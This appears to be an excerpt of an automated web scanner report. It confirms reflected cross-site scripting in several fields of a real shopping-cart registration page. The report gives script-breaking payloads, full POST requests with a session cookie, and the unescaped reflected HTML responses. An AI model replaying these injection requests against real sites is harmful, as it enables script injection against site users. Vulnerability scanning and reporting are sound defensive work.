&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

<option value="1" Selected>Search Engine</option>
<option value="2">Other Web Site</option>
<option value="3">Print Ad</option>
<option value="4">Radio Ad</option>
<option value="5">Friend</option>
<option value="6">Email</option>
<option value="7"></option>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
cmbAdvert POST 1
Register POST Register
txtAddress1 POST 3
txtAddress2 POST 3
txtAltPhone POST '"--></style></script><script>alert(0x00013F)</script>
txtBusinessName POST Smith
txtCity POST 3
txtCountry POST 3
txtEmail POST netsparker@example.com
txtFax POST 3
txtFirstName POST Smith
txtHint POST 3
txtLastName POST Smith
txtMiddleIntial POST 3
txtpassword POST 3
txtpassword2 POST 3
txtPhone POST 3
txtState POST AB
txtZip POST 3
Type POST 42

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 377
Accept-Encoding: gzip, deflate

cmbAdvert=1&Register=Register&txtAddress1=3&txtAddress2=3&txtAltPhone='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00013F)%3c%2fscript%3e&txtBusinessName=Smith&txtCity=3&txtCountry=3&txtEmail=netsparker%40example.com&txtFax=3&txtFirstName=Smith&txtHint=3&txtLastName=Smith&txtMiddleIntial=3&txtpassword=3&txtpassword2=3&txtPhone=3&txtState=AB&txtZip=3&Type=42

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:24:42 GMT
Content-Length: 12522
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country">Other Country</option>
<option value="AB" selected>AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE">DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="'"--></style></script><script>netsparker(0x00013F)</script>"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

<option value="1" Selected>Search Engine</option>
<option value="2">Other Web Site</option>
<option value="3">Print Ad</option>
<option value="4">Radio Ad</option>
<option value="5">Friend</option>
<option value="6">Email</option>
<option value="7"></option>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
cmbAdvert POST 1
Register POST Register
txtAddress1 POST 3
txtAddress2 POST 3
txtAltPhone POST 3
txtBusinessName POST '"--></style></script><script>alert(0x000140)</script>
txtCity POST 3
txtCountry POST 3
txtEmail POST netsparker@example.com
txtFax POST 3
txtFirstName POST Smith
txtHint POST 3
txtLastName POST Smith
txtMiddleIntial POST 3
txtpassword POST 3
txtpassword2 POST 3
txtPhone POST 3
txtState POST AB
txtZip POST 3
Type POST 42

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 373
Accept-Encoding: gzip, deflate

cmbAdvert=1&Register=Register&txtAddress1=3&txtAddress2=3&txtAltPhone=3&txtBusinessName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000140)%3c%2fscript%3e&txtCity=3&txtCountry=3&txtEmail=netsparker%40example.com&txtFax=3&txtFirstName=Smith&txtHint=3&txtLastName=Smith&txtMiddleIntial=3&txtpassword=3&txtpassword2=3&txtPhone=3&txtState=AB&txtZip=3&Type=42

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:24:45 GMT
Content-Length: 12518
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="'"--></style></script><script>netsparker(0x000140)</script>"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country">Other Country</option>
<option value="AB" selected>AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE">DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

<option value="1" Selected>Search Engine</option>
<option value="2">Other Web Site</option>
<option value="3">Print Ad</option>
<option value="4">Radio Ad</option>
<option value="5">Friend</option>
<option value="6">Email</option>
<option value="7"></option>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
cmbAdvert POST 1
Register POST Register
txtAddress1 POST 3
txtAddress2 POST 3
txtAltPhone POST 3
txtBusinessName POST Smith
txtCity POST '"--></style></script><script>alert(0x000141)</script>
txtCountry POST 3
txtEmail POST netsparker@example.com
txtFax POST 3
txtFirstName POST Smith
txtHint POST 3
txtLastName POST Smith
txtMiddleIntial POST 3
txtpassword POST 3
txtpassword2 POST 3
txtPhone POST 3
txtState POST AB
txtZip POST 3
Type POST 42

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 377
Accept-Encoding: gzip, deflate

cmbAdvert=1&Register=Register&txtAddress1=3&txtAddress2=3&txtAltPhone=3&txtBusinessName=Smith&txtCity='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000141)%3c%2fscript%3e&txtCountry=3&txtEmail=netsparker%40example.com&txtFax=3&txtFirstName=Smith&txtHint=3&txtLastName=Smith&txtMiddleIntial=3&txtpassword=3&txtpassword2=3&txtPhone=3&txtState=AB&txtZip=3&Type=42

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:24:48 GMT
Content-Length: 12522
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="'"--></style></script><script>netsparker(0x000141)</script>"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country">Other Country</option>
<option value="AB" selected>AB</option>
<option value="AL">AL</option>
